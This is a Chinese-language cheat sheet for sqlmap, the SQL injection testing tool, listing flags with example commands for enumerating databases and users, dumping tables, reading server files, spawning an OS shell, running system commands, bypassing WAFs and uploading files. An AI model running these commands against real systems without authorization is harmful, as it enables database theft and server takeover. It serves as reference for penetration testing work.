💲-r:post注入(适用于所有提交方式)
sqlmap.py -r 文件路径:\X.txt (txt用burp suite抓包放到文件里)
💲-u: get注入
sqlmap.py -u 网址
💲--level: 执行等级,共有五级,第二级开始扫描cookie,第三级扫描user-agent与referer,五级扫描所有(默认一级)
sqlmap.py -u 网址 --level 1/2/3/4/5
sqlmap.py -r 文件路径:\X.txt --level 1/2/3/4/5
💲--risk: 执行测试的风险(0-3,默认为1),1测试大部分测试语句,2增加基于事件的测试语句,3会增加OR语句的SQL注入测试
sqlmap.py -u 网址 --risk 1/2/3
sqlmap.py -r 文件路径:\X.txt --risk 1/2/3
💲-v: 信息等级
0只显示python错误以及严重的信息 想看到sqlmap发送的payload最好等级为三
1同时显示基本信息和警告信息(默认)
2同时显示debug信息
3同时显示注入的payload
4同时显示HTTP请求
5同时显示HTTP响应头
6同时显示HTTP响应页面
sqlmap.py -u 网址 -v
sqlmap.py -r 文件路径:\X.txt -v
💲-p: 针对单个参数注入
sqlmap.py -u 网址 -p 参数
sqlmap.py -r 文件路径:\X.txt -p 参数
💲-threads: 线程数,可让sqlmap跑的更快,默认为10
sqlmap.py -u 网址 -threads 20
sqlmap.py -r 文件路径:\X.txt -threads 20
💲-batch-smart :智能判断测试 (含爆破)
sqlmap.py -u 网址 -batch-smart
sqlmap.py -r 文件路径:\X.txt -batch-smart
💲-m:批量注入 把注入点网址写进txt文档里,导入文档
sqlmap.py -m 文件路径:\X.txt
💲--dbs:默认显示所有数据库名
sqlmap.py -u 网址 --dbs
sqlmap.py -r 文件路径:\X.txt --dbs
💲--current-user:大多数数据库中可检测到数据库管理系统当前用户
sqlmap.py -u 网址 --current-user
sqlmap.py -r 文件路径:\X.txt --current-user
💲--current-db:当前连接数据库名
sqlmap.py -u 网址 --current-db
sqlmap.py -r 文件路径:\X.txt --current-db
💲--is-dba:判断当前的用户是否为管理
sqlmap.py -u 网址 --is-dba
sqlmap.py -r 文件路径:\X.txt --is-dba
💲--users:列出数据库所有所有用户
sqlmap.py -u 网址 --users
sqlmap.py -r 文件路径:\X.txt --users
💲--tables -D 数据库名: 获取数据库表名
sqlmap.py -u 网址 --tables -D 数据库名
sqlmap.py -r 文件路径:\X.txt --tables -D 数据库名
💲--columns -T 表名 -D 数据库名:获取字段名
sqlmap.py -u 网址 --columns -T 表名 -D 数据库名
sqlmap.py -r 文件路径:\X.txt --columns -T 表名 -D 数据库名
💲-T 表名 -C 字段名 --dump:获取字段内容
sqlmap.py -u 网址 -T 表名 -C 字段名 --dump
sqlmap.py -r 文件路径:\X.txt -T 表名 -C 字段名 --dump
(dump是下载,路径:D:\VStart50\tools\注入检测\sqlmap\output\IP地址\数据库名)
💲--file-read 读取文件内容
sqlmap.py -u 网址 --file-read 文件路径:\X.txt
sqlmap.py -r 文件路径:\X.txt --file-read 文件路径:\X.txt
💲--os-shell 系统交互,可操做系统
sqlmap.py -u 网址 --os-shell
sqlmap.py -r 文件路径:\X.txt --os-shell
💲--tamper "脚本" sqlmap利用脚本绕过waf
sqlmap.py -u 网址 --tamper "脚本"
sqlmap.py -r 文件路径:\X.txt "脚本"
💲--net user 执行net user命令,可探测物理路径
sqlmap.py -u “url” --os-cmd="net user” /*执行net user命令*/ (可探测物理路径)
💲--file-write --file-dest 上传文件
sqlmap.py -u --file-write "C:/文件来源路径/文件名” --file-dest “C:/文件目的地/文件名” -v1
